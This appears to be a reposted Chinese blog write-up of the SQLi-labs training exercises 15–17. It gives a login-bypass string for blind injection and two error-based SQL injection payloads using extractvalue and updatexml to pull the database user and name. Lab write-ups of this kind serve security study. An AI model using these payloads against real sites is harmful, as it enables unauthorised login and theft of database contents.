sqlilab less15-17 - 走看看

zoukankan html css js c++ java

sqlilab less15-17

less15

试了很多符号,页面根本不显示别的信息,猜测为盲注
可是怎么检测闭合?
万能密码登录
最终试出来’闭合
uname=1’ or 1=1 #
接下来就要工具跑

less16

同上用万能密码试闭合,工具/脚本跑

less-17

原理https://www.cnblogs.com/laoxiajiadeyun/p/10488731.html

insert基于报错的注入,updatexml(php>5.1),extractvalue
uname=Dumb&passwd=aaa' or extractvalue(1, concat(0x7c,(select user())));-- #&submit=Submit

uname=Dumb&passwd=aaa' or updatexml(123,concat('~',(select database())),123)-- #&submit=Submit

查看全文

相关阅读:
双系统卸载linux和装双系统的方法
 linux中使用vim编译C++程序
 存储器管理之页面置换算法
 Python中open文件的各种打开模式
 RAL调用
 分布式系统事务一致性解决方案
 消息队列设计
 nmq消息队列解析
 分布式session的实现
 分布式系统常用思想和技术总结 (入门很清楚)

原文地址：https://www.cnblogs.com/l0nmar/p/12553817.html

Copyright © 2011-2022 走看看